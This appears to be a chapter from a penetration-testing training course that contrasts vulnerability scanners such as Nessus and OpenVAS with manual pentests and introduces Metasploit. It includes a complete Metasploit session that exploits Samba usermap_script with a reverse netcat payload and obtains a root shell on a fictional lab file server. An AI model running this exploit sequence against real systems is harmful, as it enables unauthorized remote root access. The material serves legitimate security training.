Hacking VI: Vulnerability scanner and penetration testing frameworks

It goes without saying that many processes in a penetration test can and should be automated. We can write scripts, for example, that find web applications within a network. Another but more complex version of this example are vulnerability scanners, which automatically search for vulnerabilities in an IT system. Identifying vulnerabilities is not only the main task of a vulnerability scanner, but also our job as a penetration tester. The question then is whether a vulnerability scan can be compared to a penetration test and if not, how they differ from each other.

Vulnerability scans must be configured and started by a user. After that, a vulnerability scanner will automatically search for weak points. A penetration test, on the other hand, involves manual test phases, which naturally will take much longer. Also, vulnerability scanners can only identify known vulnerabilities, as they must be listed within the software. In addition, a pentester could search for new “unknown“ vulnerabilities or creatively combine multiple conditions to compromise an IT system. For example, a web server could access the files of an FTP server, only requiring an attacker to have FTP access in order to execute a command via PHP.

We identified another difference between vulnerability scanners and pentesters with regards to exploiting vulnerabilities. At the request of the client, pentesters will exploit vulnerabilities to figure out how deep an attacker would have been able to penetrate into the target system. A vulnerability scanner, on the other hand, can show false positives during vulnerability scans. This means that any auto-identified vulnerability must be manually verified.

Thus, a penetration test can include a vulnerability scan, but will actually do much more than that. It should be noted here that tools and, in particular, vulnerability scanners should only be used if their impact on the environment under investigation can be assessed. Otherwise, we are at a loss when a client contacts us about sudden malfunctions in the production system. We should also be aware that we can be hacked ourselves when executing third-party scripts or tools. It is therefore essential to look at the source code - if possible - and to take security precautions such as using isolated systems as a working platform.

There are currently many vulnerability scanners on the market. Two of the best known are Nessus and OpenVas. Nessus of Tenable Network Security is a commercial scanner that can be used on these platforms: Windows, Linux, Unix and Mac OS X. OpenVas only exists for Linux, however, but it is available for free as OpenSource software.

In addition to the current vulnerability scanners on the market, Rapid7 has designed its own penetration testing framework: Metasploit. Metasploit essentially provides a collection of exploits that can be customised to the needs of an attacker or tester with various options. To learn how to use it, Offensive Security designed its own publicly available training course: Metasploit Unleashed (https://www.offensive-security.com/metasploit-unleashed/). The following listing shows an example of how to use Metasploit to automatically exploit a vulnerability in the file server of Dubius Payment Ltd.:

~# msfconsole 
msf > use exploit/multi/samba/usermap_script 
msf exploit(usermap_script) > set RHOST 10.247.97.48 
RHOST => 10.247.97.48 
msf exploit(usermap_script) > set RPORT 445 
RPORT => 445 
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse_netcat 
PAYLOAD => cmd/unix/reverse_netcat 
msf exploit(usermap_script) > set LHOST 10.20.1.14 
LHOST => 10.20.1.14 
msf exploit(usermap_script) > set LPORT 4444 
LPORT => 4444 
msf exploit(usermap_script) > exploit 
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Command shell session 1 opened (10.20.1.14:4444 -> 10.247.97.48:54765) 
    at Wed Nov 28 13:39.22 +0100 2017 


ip addr show 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 
    inet 127.0.0.1/8 scope host lo 
       valid_lft forever preferred_lft forever 
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever 
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 
    link/ether d6:15:2f:c4:9a:96 brd ff:ff:ff:ff:ff:ff 
    inet 10.247.97.48/24 brd 10.247.97.255 scope global eth0 
       valid_lft forever preferred_lft forever 
    inet6 fe80::d415:2fff:fec4:9a96/64 scope link 
       valid_lft forever preferred_lft forever 
hostname 
ftp01 
id 
uid=0(root) gid=0(root) groups=0(root)

Remark: The above scenario does not work in the practice lab.

If we want to compare the validity of vulnerability scans with the validity of penetration tests, we must have a clear understanding of the false negative ratio (FNR): how many vulnerabilities are not identified as such by a vulnerability scanner, even though the security gap exists? If you like, you can discover this for yourself by scanning the DMZ network of Dubius Payment with Nessus (7-day trial) or OpvenVas, for example. In your opinion, how many vulnerabilities will a vulnerability scan list? 0, 10, 25 or even more than 50?